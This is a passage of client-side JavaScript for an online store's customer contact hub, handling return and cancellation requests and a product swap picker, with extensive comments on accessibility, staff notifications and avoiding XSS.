          '<button type="button" class="lc-btn lc-btn--ghost" data-back>' +
            esc(t("shared.btn.back")) + '</button>' +
        '</div>' +
        '<p id="rt-send-hint" class="lc-step-note" style="margin:12px 0 0" aria-live="polite">' +
          esc(t("address.review.hintTick")) + '</p>' +
        '<p class="lc-field-error" id="rt-form-err" role="alert" tabindex="-1" hidden></p>' +
      '</section>' +
      returnsHumanNote();
  },

  mount: function () {
    var box = $("#rt-confirm"), btn = $("#rt-send"), hint = $("#rt-send-hint");
    if (!box || !btn || !hint) return;
    var sending = false;

    box.addEventListener("change", function () {
      btn.setAttribute("aria-disabled", String(!box.checked));
      hint.textContent = t(box.checked ? "address.review.hintReady" : "address.review.hintTick");
    });

    btn.addEventListener("click", function () {
      if (sending) return;
      if (State.submitted["refund-return"]) {
        say(t("shared.say.alreadySent"));
        Router.go("returnsReview", { replace:true });
        return;
      }
      if (btn.getAttribute("aria-disabled") === "true") {
        say(t("address.review.sayTick"));
        hint.textContent = t("address.review.sayTick");
        box.focus();
        return;
      }
      if (!returnsDraftValid()) { Router.go("returnsStart", { replace:true }); return; }

      var order = State.order, d = State.returns;
      var ev = evaluateReturn(order, d.reason, d.severity);
      var err = $("#rt-form-err");
      if (err) { err.hidden = true; err.textContent = ""; }
      sending = true;
      btn.setAttribute("aria-disabled", "true");
      btn.innerHTML = '<span class="lc-spinner"></span> ' + esc(t("shared.btn.sending"));
      say(t("shared.say.sending"));

      /* THE REAL SEND. Only ids and the customer's own words go across. The
         evidence entries carry KEYS, not files — the bytes are already in the
         Worker's bucket, and the Worker re-checks every key against this
         order's tag before it attaches any of them. */
      submitRequest("refund-return", {
        reason:     d.reason,
        severity:   d.severity || "",
        detail:     d.detail || "",
        lineItemId: d.item ? d.item.id : "",
        evidence:   d.evidence.map(function (e) { return { key:e.key, shot:e.shot }; })
      }).then(function (res) {
        sending = false;
        if (!State.order || State.order !== order) {
          if (res && res.ok) say(submitAnnouncement("refund-return", res));
          return;
        }

        if (!res.ok) {
          submitFailed("refund-return", res, err, function (canRetry) {
            if (!canRetry) {
              btn.hidden = true;
              if (hint) hint.textContent = "";
              return;
            }
            btn.setAttribute("aria-disabled", "false");
            btn.textContent = t("shared.btn.tryAgain");
            if (hint) hint.textContent = t("address.review.hintRetry");
          });
          return;
        }

        var id = res.requestId;
        var reason = returnReason(d.reason);
        var severity = returnSeverity(d.severity);
        /* Mirrors expectsThreePLCredit() in worker/src/returns.js: only the
           `unusable` tier is creditable, and a mis-pick or a lost parcel is
           credited whole with no severity question. */
        var credited = !!(reason && reason.threePL &&
                          (reason.severity ? (severity && severity.id === "unusable")
                                           : reason.fault));

        var days = ev.daysSinceDelivery;
        var deliveredPhrase = days === null
          ? "Not showing as delivered yet."
          : (ev.delivery.certain
              ? "Delivered " + (days === 0 ? "today" : days + " day" + (days === 1 ? "" : "s") + " ago") +
                " (carrier confirmed)."
              : "Estimated delivered about " + days + " day" + (days === 1 ? "" : "s") +
                " ago — no carrier confirmation.");

        var ctx = buildDiscordContext(order, {
          claimHeading: credited ? "DAMAGE CLAIM (Replacement Requested)"
                                 : "DAMAGE REPORT (No Action Needed)",
          reasonLabel: reason ? reason.notion : "Problem reported",
          severityLabel: severity ? t("returns.severity." + severity.id + ".label").toUpperCase()
                                  : "SEVERITY NOT GIVEN",
          deliveredPhrase: deliveredPhrase,
          detail: d.detail || "No detail given.",
          photoLine: d.evidence.length
            ? "Photos attached: " + d.evidence.map(function (e) { return e.label; }).join(" · ")
            : "No photos were supplied.",
          ask: credited
            ? "We are sending a replacement and the customer is keeping the original.\n" +
              "Please confirm the product cost will be credited back on this one."
            : "We are handling this with a partial refund and the customer is keeping the item.\n" +
              "NO CREDIT REQUESTED — sending this so the cause can be traced. " +
              "If this keeps happening on the same product it is worth a look at how the cartons are opened.",
          qty: d.item ? d.item.quantity : 0,
          product: d.item ? itemLabel(d.item) : "—"
        });

        State.submitted["refund-return"] = id || true;

        var notionProps = baseNotionProps(order, "refund-return",
          "Customer reported " + (reason ? reason.notion.toLowerCase() : "a problem") +
          (severity ? " (" + t("returns.severity." + severity.id + ".label").toLowerCase() + ")" : "") +
          " on " + order.name +
          (days === null ? "" : ", " + days + " day" + (days === 1 ? "" : "s") + " after delivery") +
          ". " + d.evidence.length + " photo" + (d.evidence.length === 1 ? "" : "s") + " supplied." +
          (d.detail ? " Customer's note: " + d.detail : ""),
          fmtDateTime(new Date().toISOString()) + " — Request " + idForLog(id) +
          " raised from the contact hub. " +
          (credited
            ? "We have asked " + CONFIG.fulfillment.threePL + " to credit the product cost — " +
              "a replacement is roughly cost-neutral to us once it lands. "
            : "We do not get a credit from " + CONFIG.fulfillment.threePL + " at this severity, " +
              "so whatever we give here we absorb. A partial refund with the customer keeping " +
              "the item is the cheapest resolution — cheaper than a replacement. ") +
          "NOTHING HAS BEEN OFFERED TO THE CUSTOMER YET. Human approval is required before " +
          "any money moves.");

        /* THE PREVIEW'S CATEGORY AND PROGRESS COME FROM THE REASON, exactly as
           the Worker's do — a damaged pool tent belongs in Product Damaged and
           a missing parcel in Order Lost, not all six in Refund Request. The
           flat maps in CONFIG.notion cannot express that, so they are
           overridden here rather than made reason-shaped for one flow. */
        notionProps["Category"] = returnsNotionCategory(d.reason);
        notionProps["Progress"] = (reason && reason.threePL)
          ? "Awaiting 3PL Response" : "Awaiting Approval";

        State.result = {
          requestId: id,
          discordTitle: t("preview.title"),
          discord: (reason && reason.id === "never-arrived")
            ? CONFIG.discord.lostParcel(ctx)
            : CONFIG.discord.damageClaim(ctx),
          notion: notionProps,
          /* The plain confirmation. Money no longer moves at submit — it moves
             when the customer picks an offer on the next screen, and
             VIEWS.returnsOffers rewrites these two before routing here. */
          heading: t("returns.success.heading"),
          blurb: t("returns.success.blurb", { order: order.name, email: order.email }),
          flow: "refund-return",
          /* Nothing here goes to the 3PL for a change of mind, and the success
             copy must not imply otherwise. */
          told: !!(reason && reason.threePL)
        };
        /* THE WORKER DECIDES WHETHER THERE IS ANYTHING TO CHOOSE FROM. It
           withholds the set for a declined claim and for a customer §8 has
           held for review, so an absent `offers` is a real answer and the
           plain confirmation is the right screen. */
        Router.go((res.offers && res.offers.length) ? "returnsOffers" : "success",
                  { replace:true });
      });
    });
  }
};

/* Kept in step with CATEGORY_BY_FLOW plus the per-reason routing in
   worker/src/notion.js. Every value is an option that already exists on the
   board, so the preview names a column the client will recognise. */
function returnsNotionCategory(reasonId) {
  switch (reasonId) {
    case "damaged-in-transit":
    case "faulty":
    case "wrong-item":       return "Product Damaged";
    case "never-arrived":    return "Order Lost";
    case "spelling-wrong":   return "Personalisation Amendment";
    default:                 return "Refund Request";
  }
}

/* ------------------------------------------------------------------------ */

/* --- CANCEL: gate --------------------------------------------------------- */
VIEWS.cancelGate = {
  render: function () {
    var order = State.order, el = evaluate(order);
    if (!el.actionable) {
      return backBar(t("shared.backToOptions")) +
        '<h1 data-view-title>' + esc(t("cancel.heading")) + '</h1>' +
        orderSummaryCard(order, { hideItems:true }) +
        policyNote(el) +
        ineligibleCard(order, "cancel-order");
    }
    /* Already sent. Without this, "See my order status" -> "Cancel my order"
       re-renders the live form and fires a second stop request at the 3PL plus a
       second Notion row for one customer. */
    if (State.submitted["cancel-order"]) {
      return backBar(t("shared.backToOptions")) +
        '<h1 data-view-title>' + esc(t("cancel.heading")) + '</h1>' +
        orderSummaryCard(order, { hideItems:true }) +
        alreadyRequestedCard(order, "cancel-order");
    }

    var items = realItems(order).map(function (li) {
      return '<li><span>' + esc(itemLabel(li)) + '<br><span class="lc-qty">' +
             esc(t("shared.quantity", { qty: li.quantity })) +
             '</span></span><span class="lc-price">' +
             money(li.originalTotalSet.shopMoney.amount) + '</span></li>';
    }).join("");

    return backBar(t("shared.backToOptions")) +
      '<h1 data-view-title>' + esc(t("cancel.heading")) + '</h1>' +
      /* P0 (round 5): "our records show", not a claim about the parcel itself.
         The 3PL packs inside MabangErp3 and pushes tracking to Shopify after
         the fact, so everything this page can see is a snapshot that may
         already be a little behind the bench. See policyNote(). */
      '<p class="lc-step-note">' +
        t(el.interceptOnly ? "cancel.stepNote.intercept" : "cancel.stepNote.open") + '</p>' +
      orderSummaryCard(order, { hideItems:true }) +
      policyNote(el) +
      (el.interceptOnly
        ? interceptNoticeCard(el, t("intercept.what.stop"))
        : '<section class="lc-card lc-card--good">' +
            '<h2>' + esc(t("cancel.eligible.heading")) + '</h2>' +
            /* P0 (round 5). Was "Your order is still sitting with our packing
               team" — an assertion about where the parcel physically is, which
               Shopify cannot support during the MabangErp3 upload lag. */
            '<p>' + t("cancel.eligible.body1") + '</p>' +
            '<p style="margin:0">' + t("cancel.eligible.body2") + '</p>' +
          '</section>') +
      '<section class="lc-card">' +
        '<h2>' + esc(t("cancel.items.heading")) + '</h2>' +
        '<ul class="lc-items">' + items + '</ul>' +
        (hasSeel(order)
          ? '<p class="lc-step-note" style="margin:14px 0 0">' + t("cancel.seelNote") + '</p>' : "") +
        '<div class="lc-field" style="margin:22px 0 0">' +
          '<label for="cx-reason">' + esc(t("cancel.reason.label")) + '</label>' +
          '<p class="lc-hint" id="cx-reason-hint">' + t("cancel.reason.hint") + '</p>' +
          '<textarea id="cx-reason" aria-describedby="cx-reason-hint" ' +
            'placeholder="' + esc(t("cancel.reason.placeholder")) + '"></textarea>' +
        '</div>' +
        /* Where a failed send is reported. role="alert" so it is announced the
           moment it is filled, tabindex="-1" so submitFailed() can move focus
           to it — the same treatment the failed lookup gets. */
        '<p class="lc-field-error" id="cx-form-err" role="alert" tabindex="-1" hidden></p>' +
        '<div class="lc-btn-row">' +
          '<button type="button" class="lc-btn" id="cx-submit">' +
            esc(t("cancel.submit")) + '</button>' +
          '<button type="button" class="lc-btn lc-btn--ghost" data-back>' +
            esc(t("cancel.keep")) + '</button>' +
        '</div>' +
      '</section>';
  },

  mount: function () {
    var btn = $("#cx-submit");
    if (!btn) return;
    var sending = false;
    btn.addEventListener("click", function () {
      if (sending) return;
      /* Belt and braces behind the render() guard: `sending` only protects one
         mount, and a Back press re-mounts this view with a fresh closure. */
      if (State.submitted["cancel-order"]) {
        say(t("shared.say.alreadySent"));
        Router.go("cancelGate", { replace:true });
        return;
      }
      var order = State.order;
      var reason = ($("#cx-reason").value || "").trim();
      var err = $("#cx-form-err");
      if (err) { err.hidden = true; err.textContent = ""; }
      sending = true;
      /* aria-disabled, NOT the real attribute. A truly disabled button is
         removed from the tab order, so pressing Enter on it dumped focus onto
         <body> — no focus, no announcement, and on a slow connection no
         indication anything was happening at all. The `if (sending) return;`
         guard at the top of this handler is the real re-entrancy protection;
         the attribute is presentational. The two review screens have always
         done it this way. */
      btn.setAttribute("aria-disabled", "true");
      btn.innerHTML = '<span class="lc-spinner"></span> ' + esc(t("shared.btn.sending"));
      /* The button label is not in a live region, so without this a screen
         reader user hears nothing for the whole in-flight window. */
      say(t("shared.say.sending"));

      /* THE REAL SEND. The Worker re-reads the order from Shopify, re-verifies
         the email, re-checks eligibility against live fulfilment state, and only
         then writes to the packing team's channel and the CS board. Nothing
         below this line runs on a timer, and nothing below it is reached unless
         the Worker confirmed it. orderCancel itself still only runs after a
         human approves — it is asynchronous and irreversible. */
      submitRequest("cancel-order", { reason: reason }).then(function (res) {
        sending = false;
        /* A different order was looked up while this was in flight. The form is
           gone; touch nothing — EXCEPT that a confirmed ok:true must still be
           said out loud rather than dropped on the floor. */
        if (!State.order || State.order !== order) {
          if (res && res.ok) say(submitAnnouncement("cancel-order", res));
          return;
        }

        if (!res.ok) {
          submitFailed("cancel-order", res, err, function (canRetry) {
            if (!canRetry) { btn.hidden = true; return; }
            btn.setAttribute("aria-disabled", "false");
            btn.textContent = t("shared.btn.tryAgain");
          });
          return;
        }

        var id = res.requestId;
        var el = evaluate(order);
        /* The SERVER's state, not our stale copy — see interceptVerdict(). */
        var interceptOnly = interceptVerdict(res, el);
        /* ONLY NOW. A failed submit leaves this unset so the flow stays
           retryable and the already-requested card cannot appear for a request
           nobody received. `true` when the Worker confirmed without naming an
           id — still submitted, just nothing to quote. */
        State.submitted["cancel-order"] = id || true;
        var ctx = buildDiscordContext(order);
        var summary = "Customer requested cancellation of " + order.name + " via the contact hub." +
                      (reason ? " Customer's note: " + reason : "");
        /* STAFF-FACING, and it must not describe an action that cannot happen.
           A fulfillmentOrderHold only exists while a fulfillment order is still
           open; on TRACKING_ASSIGNED it is closed and already labelled, so the
           remedy is an interception request, not a hold. */
        var holdLine = interceptOnly
          ? interceptStaffLine(el) + " — INTERCEPTION REQUEST, not a hold. "
          /* NOT "placed ON HOLD". Nothing places a hold — not this file and not
             the Worker, which writes to the channel and the CS board and
             nowhere else — and, per the 3PL (2026-08-03), MabangErp3
             fulfils inside its own system and uploads the tracking number to
             Shopify afterwards. Shopify is DOWNSTREAM: a hold applied after
             Mabang has pulled the order does nothing at all. The Discord
             message to a human IS the interception. Telling the CS operator
             the order is safely held is the one false claim that stops them
             chasing the packing team, which is the only thing that works. */
          : "Fulfilment order still OPEN in Shopify. Place it on hold if it is still " +
            "holdable, but note Shopify is downstream of " + CONFIG.fulfillment.threePL +
            " and the Discord message is the interception. Do not treat this as stopped " +
            "until the packing team replies. ";
        State.result = {
          requestId: id,
          discordTitle: t("preview.title"),
          discord: CONFIG.discord.cancellation(ctx),
          notion: baseNotionProps(order, "cancel-order", summary,
                    fmtDateTime(new Date().toISOString()) + " — Request " + idForLog(id) +
                    " raised from the contact hub. " + holdLine +
                    "Awaiting confirmation from " + CONFIG.fulfillment.threePL +
                    " before cancelling in Shopify."),
          heading: t("cancel.success.heading"),
          blurb: t("cancel.success.blurb", { order: order.name, email: order.email }),
          flow: "cancel-order",
          extraNote: joinNotes(relayNote(res), recordNote(res),
                               interceptSuccessNote(el, interceptOnly)),
          announce: submitAnnouncement("cancel-order", res)
        };
        Router.go("success", { fade:true });
      })
      /* NOTHING ABOVE MAY THROW INTO A VOID. submitRequest() itself never
         rejects, but everything after State.submitted is set reads order data
         that came off the network — buildDiscordContext, the CONFIG message
         builders, baseNotionProps. A throw in there used to reject into nothing:
         no confirmation, no id, the button left spinning, and the flow
         permanently marked submitted so every re-entry showed the
         already-requested card. The request DID go through in that case, which
         is why "render" says the opposite of the network branch. */
      .catch(function (e) {
        sending = false;
        if (window.console && console.error) console.error("[contact-hub] submit render", e);
        try {
          var told = !!State.submitted["cancel-order"];
          submitFailed("cancel-order",
            told ? { ok:false, told:true, reason:"render",
                     requestId: typeof State.submitted["cancel-order"] === "string"
                       ? State.submitted["cancel-order"] : "" }
                 : { ok:false, told:false, reason:"unknown" },
            err,
            function (canRetry) {
              if (!canRetry) { btn.hidden = true; return; }
              btn.setAttribute("aria-disabled", "false");
              btn.textContent = t("shared.btn.tryAgain");
            });
        } catch (e2) { /* never throw out of a catch handler */ }
      });
    });
  }
};

/* ------------------------------------------------------------------------ */

/* ===========================================================================
   SWAP PRODUCT PICKER — the "Swap it for something else" replacement for the
   old <select>.

   XSS POSTURE (read before touching this):
   Every node below is created with document.createElement and filled with
   textContent / setAttribute. There is NOT ONE innerHTML assignment in this
   section, and specifically the search term the customer types is never
   concatenated into markup — it goes into a text node via textContent for the
   "no matches" line and nowhere else. The rest of the page builds HTML
   strings, which is fine for its trusted CONFIG copy; a live-filtered list
   driven by keystrokes is exactly the case where that habit turns into a sink.

   The search reuses the FAQ engine's helpers — lcTokens (normalise + stem)
   and lcFieldHit (exact / prefix / Damerau-Levenshtein typo tolerance). No
   library, no second implementation of "close enough".
   =========================================================================== */

/* The most of any one item a customer can add to a swap. Stated in the visible
   help text (#am-swap-help) and announced by setQty() when it clamps, so the
   number never silently changes under them. */
var SWAP_QTY_MAX = 10;

/* Build the searchable index once per mount. `excludeItem` is the LINE ITEM
   being swapped OUT — recommending someone the exact thing they are trying to
   get rid of is the single most obviously wrong result the picker could give,
   so it is removed from the corpus rather than filtered at render time.

   A6.3 EXCLUSION KEY. Matching on the product title alone is fragile: Shopify
   stores the title as it was AT PURCHASE TIME, so the day the client renames
   "Little Cubs Pop-Up Pool Tent" to "… 2.0" every older order stops matching
   the catalogue entry and the picker starts offering the customer the exact
   product they are trying to get rid of. The variant id does not move when a
   product is renamed and is already in the confirmed GraphQL projection
   (`variant{id title}`), so it is tried first; the normalised title is the
   fallback for any payload that omits it (including the mock orders, whose
   line items carry no variant object). Same degrade-safely shape as isSeel()
   and foIsOpen(). */
function swapVariantIdOf(lineItem) {
  var v = lineItem && lineItem.variant;
  var raw = v && v.id;
  if (!raw) return "";
  /* "gid://shopify/ProductVariant/42896083583153" -> "42896083583153" */
  return String(raw).replace(/^.*\//, "");
}

/* CONFIG.catalogue became an object in round 5 (it now carries
   `excludeCollection` alongside the products), so nothing reads it as an array
   directly any more. Tolerant of the old array shape on purpose: this file is
   about to be copied into a Liquid section by a different pair of hands, and a
   catalogue that silently evaluates to `undefined.length` would take out the
   whole amendment flow. */
function catalogueItems() {
  var c = CONFIG.catalogue;
  if (Array.isArray(c)) return c;
  return (c && Array.isArray(c.items)) ? c.items : [];
}

/* The handle of the collection whose products may never be offered as a swap
   target. Blank/absent means "exclude nothing", which is the correct behaviour
   for a store that sells no personalised items. */
function catalogueExcludedCollection() {
  var c = CONFIG.catalogue;
  return String((c && !Array.isArray(c) && c.excludeCollection) || "").trim().toLowerCase();
}

function productInCollection(p, handle) {
  if (!handle) return false;
  var list = (p && p.collections) || [];
  for (var i = 0; i < list.length; i++) {
    if (String(list[i]).trim().toLowerCase() === handle) return true;
  }
  return false;
}

function swapBuildIndex(excludeItem) {
  var excludeTitle = "", excludeVariantId = "";
  if (typeof excludeItem === "string") {
    excludeTitle = excludeItem;                    // legacy/title-only callers
  } else if (excludeItem) {
    excludeTitle     = excludeItem.title || "";
    excludeVariantId = swapVariantIdOf(excludeItem);
  }
  var exclude = lcNorm(excludeTitle);

  /* ROUND 5 — THE COLLECTION EXCLUSION, and it is applied here rather than at
     render time for the same reason the swapped-out item is: a product that is
     filtered out of the grid but left in the search corpus still turns up the
     moment somebody types its name, which is the one interaction where an
     excluded product is most likely to be reached.

     WHY PERSONALISED PRODUCTS CANNOT BE SWAP TARGETS: this picker has nowhere
     to type a name. Swapping into an embroidered backpack would send the 3PL an
     item to personalise with no personalisation, and the customer would have
     confirmed it without ever being asked for a spelling. The client chose a
     collection rather than a list of ids so they can add the next personalised
     product without touching code. */
  var excludedCollection = catalogueExcludedCollection();

  function isExcluded(p) {
    if (productInCollection(p, excludedCollection)) return true;
    if (excludeVariantId) {
      for (var i = 0; i < p.variants.length; i++) {
        if (String(p.variants[i].id) === excludeVariantId) return true;
      }
    }
    return !!exclude && lcNorm(p.title) === exclude;
  }

  return catalogueItems()
    .filter(function (p) { return !isExcluded(p); })
    .map(function (p) {
      var text = p.title + " " +
                 p.variants.map(function (v) { return v.title; }).join(" ") + " " +
                 (p.keywords || []).join(" ");
      var toks = lcTokens(text, true);   // keepStop: product titles are short
      return { product:p, tokens:toks, set:new Set(toks) };
    });
}

/* AND semantics: every token the customer typed has to hit something, so
   "pink tent" does not return the plushy just because "pink" matched. */
function swapFilter(index, query) {
  var q = lcTokens(query, true);
  if (!q.length) return index.map(function (r) { return r.product; });
  return index.filter(function (r) {
    return q.every(function (t) { return lcFieldHit(t, r.set, r.tokens) > 0; });
  }).map(function (r) { return r.product; });
}

/* Deliberately does NOT apply the collection exclusion: it is a plain lookup
   used to resolve an id that came out of the picker, and the picker never
   offered an excluded product in the first place. Keeping the two concerns
   apart means the exclusion has exactly one implementation, in swapBuildIndex(). */
function swapProductById(id) {
  var items = catalogueItems();
  for (var i = 0; i < items.length; i++) {
    if (items[i].id === id) return items[i];
  }
  return null;
}
function swapVariantById(product, id) {
  for (var i = 0; i < product.variants.length; i++) {
    if (product.variants[i].id === id) return product.variants[i];
  }
  return product.variants[0];
}

/* --- small DOM builders (no innerHTML anywhere in this file section) ------ */
function mkEl(tag, cls, text) {
  var n = document.createElement(tag);
  if (cls) n.className = cls;
  if (text != null) n.textContent = text;
  return n;
}

/* A product image plus its fallback. If the CDN request fails — offline
   preview, ad-blocker, image pruned from the CDN — the browser's broken-image
   glyph is replaced by a tile carrying the product name, so the card is still
   readable and still selectable. */
function swapImage(product, alt) {
  var img = document.createElement("img");
  img.src = product.image;
  img.alt = alt == null ? "" : alt;
  img.loading = "lazy";
  img.decoding = "async";
  img.addEventListener("error", function () {
    if (!img.parentNode) return;
    var tile = mkEl("span", "lc-swap-card__fallback", product.title);
    tile.setAttribute("aria-hidden", "true");
    img.parentNode.replaceChild(tile, img);
  });
  return img;
}

/* ---------------------------------------------------------------------------
   buildSwapPicker(host, opts)
     host          — empty container element supplied by the view
     opts.exclude  — the LINE ITEM being swapped out (title + variant id)
     opts.swapValue— the money value being swapped out (line total)
     opts.onChange — called with the current state after every mutation

   Returns { getLines, getTotal }.
   --------------------------------------------------------------------------- */
function buildSwapPicker(host, opts) {
  var index   = swapBuildIndex(opts.exclude);
  var lines   = [];            // [{ uid, product, variant, qty }]
  var uidSeq  = 0;
  var pickerOpen = true;       // grid visible until the first pick

  /* --- search box ------------------------------------------------------- */
  var searchField = mkEl("div", "lc-field");
  var searchLabel = mkEl("label", null, t("swap.search.label"));
  searchLabel.setAttribute("for", "am-swap-q");
  var searchHint = mkEl("p", "lc-hint", t("swap.search.hint"));
  searchHint.id = "am-swap-q-hint";
  var searchInput = document.createElement("input");
  searchInput.type = "search";
  searchInput.id = "am-swap-q";
  searchInput.autocomplete = "off";
  searchInput.setAttribute("aria-describedby", "am-swap-q-hint");
  searchInput.setAttribute("aria-controls", "am-swap-grid");
  searchInput.placeholder = t("swap.search.placeholder");
  searchField.appendChild(searchLabel);
  searchField.appendChild(searchHint);
  searchField.appendChild(searchInput);

  /* Result count for screen readers — the grid repaints silently otherwise. */
  var srCount = mkEl("p", "sr-only");
  srCount.setAttribute("aria-live", "polite");

  var grid = mkEl("div", "lc-swap-grid");
  grid.id = "am-swap-grid";
  grid.setAttribute("role", "list");

  var emptyMsg = mkEl("p", "lc-swap-empty");
  emptyMsg.hidden = true;

  var pickerWrap = mkEl("div");
  pickerWrap.appendChild(searchField);
  pickerWrap.appendChild(srCount);
  pickerWrap.appendChild(grid);
  pickerWrap.appendChild(emptyMsg);

  /* --- chosen lines + controls ------------------------------------------ */
  var linesWrap = mkEl("div");
  var addMoreBtn = mkEl("button", "lc-btn lc-btn--ghost", t("swap.addMore"));
  addMoreBtn.type = "button";
  addMoreBtn.hidden = true;

  /* A6.6 asks for the WHOLE three-part running total to be live. The live
     region is therefore the box, not just the closing clause: with aria-live on
     the verdict alone a screen-reader user heard a bare "$6.00 still to come
     back to you" and was never told what the new "Adding" figure was, nor which
     line they had just changed. aria-atomic is what makes it read the whole
     "Swapping out … Adding … to pay" sentence instead of the diffed fragment.

     ORDERING MATTERS: a live region that is hidden at the moment its text
     changes announces nothing, so syncVisibility() must always run BEFORE
     update(). All call sites do. Do not reverse them — it would silently kill
     every announcement without breaking anything visible. */
  var totalBox = mkEl("div", "lc-swap-total");
  totalBox.hidden = true;
  totalBox.setAttribute("role", "status");
  totalBox.setAttribute("aria-live", "polite");
  totalBox.setAttribute("aria-atomic", "true");
  var totalLine = mkEl("p", "lc-swap-total__line");
  var verdict = mkEl("p", "lc-swap-total__verdict");
  totalBox.appendChild(totalLine);
  totalBox.appendChild(verdict);

  host.appendChild(pickerWrap);
  host.appendChild(linesWrap);
  host.appendChild(addMoreBtn);
  host.appendChild(totalBox);

  /* --- grid rendering ---------------------------------------------------- */
  function renderGrid() {
    var matches = swapFilter(index, searchInput.value || "");
    while (grid.firstChild) grid.removeChild(grid.firstChild);

    matches.forEach(function (p) {
      var cell = mkEl("div");
      cell.setAttribute("role", "listitem");

      var card = mkEl("button", "lc-swap-card");
      card.type = "button";
      card.setAttribute("data-product", p.id);

      var media = mkEl("span", "lc-swap-card__media");
      media.appendChild(swapImage(p, ""));           // decorative: title is in the label
      card.appendChild(media);

      var body = mkEl("span", "lc-swap-card__body");
      body.appendChild(mkEl("span", "lc-swap-card__t", p.title));
      if (p.variants.length > 1) {
        body.appendChild(mkEl("span", "lc-swap-card__v", t("swap.card.options", { n: p.variants.length })));
      }
      var price = mkEl("span", "lc-swap-card__p",
        (p.variants.length > 1 ? t("swap.card.from") : "") + money(p.price));
      body.appendChild(price);

      if (!p.available) {
        body.appendChild(mkEl("span", "lc-swap-card__oos", t("swap.card.outOfStock")));
        /* aria-disabled ONLY — no real disabled attribute. A disabled button is
           removed from the tab order, so a keyboard user browsing the grid
           stepped straight past the Sun Hat and was never told a sixth product
           exists or that it is temporarily unavailable. It keeps focus, reads
           as "…currently out of stock, dimmed", and the click guard below is
           what actually makes it inert. */
        card.setAttribute("aria-disabled", "true");
        card.setAttribute("aria-label",
          t("swap.card.outOfStockLabel", { title: p.title, price: money(p.price) }));
      } else {
        card.setAttribute("aria-label", t("swap.card.addLabel", {
          title: p.title,
          price: (p.variants.length > 1 ? t("swap.card.from") : "") + money(p.price)
        }));
      }

      card.appendChild(body);
      cell.appendChild(card);
      grid.appendChild(cell);
    });

    var q = (searchInput.value || "").trim();
    if (!matches.length) {
      emptyMsg.hidden = false;
      /* textContent — the ONLY place the typed string reaches the DOM. */
      emptyMsg.textContent = q
        ? t("swap.empty.query", { query: q })
        : t("swap.empty.none");
    } else {
      emptyMsg.hidden = true;
      emptyMsg.textContent = "";
    }
    srCount.textContent = matches.length === 1
      ? t("swap.count.one")
      : t("swap.count.many", { n: matches.length });
  }

  /* --- chosen-line rendering --------------------------------------------- */
  function renderLines() {
    while (linesWrap.firstChild) linesWrap.removeChild(linesWrap.firstChild);

    lines.forEach(function (line, idx) {
      var row = mkEl("div", "lc-swap-line");

      var thumb = mkEl("div", "lc-swap-line__thumb");
      thumb.appendChild(swapImage(line.product, ""));
      row.appendChild(thumb);

      var main = mkEl("div", "lc-swap-line__main");
      main.appendChild(mkEl("p", "lc-swap-line__t", line.product.title));

      var controls = mkEl("div", "lc-swap-line__row");

      /* Variant options — only rendered when there is a real choice. */
      if (line.product.variants.length > 1) {
        var vField = mkEl("div", "lc-field");
        var vId = "am-swap-var-" + line.uid;
        var vLabel = mkEl("label", null, t("swap.line.option"));
        vLabel.setAttribute("for", vId);
        var sel = document.createElement("select");
        sel.id = vId;
        line.product.variants.forEach(function (v) {
          var o = document.createElement("option");
          o.value = v.id;
          o.textContent = v.title + " — " + money(v.price);
          if (!v.available) { o.disabled = true; o.textContent += t("swap.line.variantOutOfStock"); }
          if (v.id === line.variant.id) o.selected = true;
          sel.appendChild(o);
        });
        /* NEVER renderLines() from here. renderLines() empties linesWrap and
           rebuilds every row, which destroys the <select> that just fired the
           event while it still has focus — focus falls to <body>, the next Tab
           restarts from the top of the document, and a screen-reader user
           loses their place with no announcement. Every browser fires `change`
           on arrow-key navigation of a closed <select>, so this hit on the
           FIRST keypress of the one control an older customer is most likely
           to use. The only thing a variant change alters is the line's price
           string, so update that in place — exactly what setQty() already does.
           (renderLinePrice is a hoisted declaration further down this closure.)
           renderLines() is for add/remove only. */
        sel.addEventListener("change", function () {
          line.variant = swapVariantById(line.product, sel.value);
          renderLinePrice();
          update();
        });
        vField.appendChild(vLabel);
        vField.appendChild(sel);
        controls.appendChild(vField);
      }

      /* Quantity stepper. */
      var qField = mkEl("div", "lc-field");
      var qId = "am-swap-qty-" + line.uid;
      var qLabel = mkEl("label", null, t("swap.line.qty"));
      qLabel.setAttribute("for", qId);
      var stepper = mkEl("div", "lc-stepper");
      var minus = mkEl("button", null, "−");
      minus.type = "button";
      minus.setAttribute("aria-label", t("swap.line.decrease", { title: line.product.title }));
      var qInput = document.createElement("input");
      qInput.type = "number"; qInput.id = qId; qInput.min = "1";
      qInput.max = String(SWAP_QTY_MAX);
      qInput.step = "1"; qInput.value = String(line.qty);
      qInput.inputMode = "numeric";
      /* The visible <label> stays a short "Quantity" so the layout does not
         move, but with "Add more products" explicitly designed to build a
         multi-line basket, two or three controls all announcing "Quantity,
         spin button, 1" are indistinguishable. aria-label wins over the
         <label> for the accessible name; label-click-to-focus still works. */
      qInput.setAttribute("aria-label", t("swap.line.qtyLabel", { title: line.product.title }));
      var plus = mkEl("button", null, "+");
      plus.type = "button";
      plus.setAttribute("aria-label", t("swap.line.increase", { title: line.product.title }));

      /* aria-disabled, not the real disabled attribute: see the CSS note on
         .stepper button. A focused button that becomes disabled is dropped
         from the tab order and focus falls to <body> — which happened every
         time someone nudged a quantity back down to 1. */
      function syncBounds() {
        minus.setAttribute("aria-disabled", String(line.qty <= 1));
        plus.setAttribute("aria-disabled",  String(line.qty >= SWAP_QTY_MAX));
      }
      syncBounds();

      function setQty(n) {
        var want = n;
        line.qty = Math.max(1, Math.min(SWAP_QTY_MAX, n));
        qInput.value = String(line.qty);
        syncBounds();
        /* The clamp used to be silent: type 25, watch the box become 10, with
           no maximum stated anywhere on screen. For this audience a number
           changing under them for no stated reason reads as a malfunction. */
        if (want !== line.qty) {
          say(t("swap.say.clamped", { qty: line.qty, max: SWAP_QTY_MAX }));
        }
        renderLinePrice();
        update();
      }
      minus.addEventListener("click", function () {
        if (minus.getAttribute("aria-disabled") === "true") return;
        setQty(line.qty - 1);
      });
      plus.addEventListener("click", function () {
        if (plus.getAttribute("aria-disabled") === "true") return;
        setQty(line.qty + 1);
      });
      /* An empty box is not zero — the same trap the reduce-quantity field
         had. Fall back to the last good value rather than silently dropping
         the line to nothing. */
      qInput.addEventListener("change", function () {
        var raw = String(qInput.value).trim();
        if (!/^\d+$/.test(raw)) { qInput.value = String(line.qty); return; }
        setQty(Number(raw));
      });
      stepper.appendChild(minus); stepper.appendChild(qInput); stepper.appendChild(plus);
      qField.appendChild(qLabel);
      qField.appendChild(stepper);
      controls.appendChild(qField);
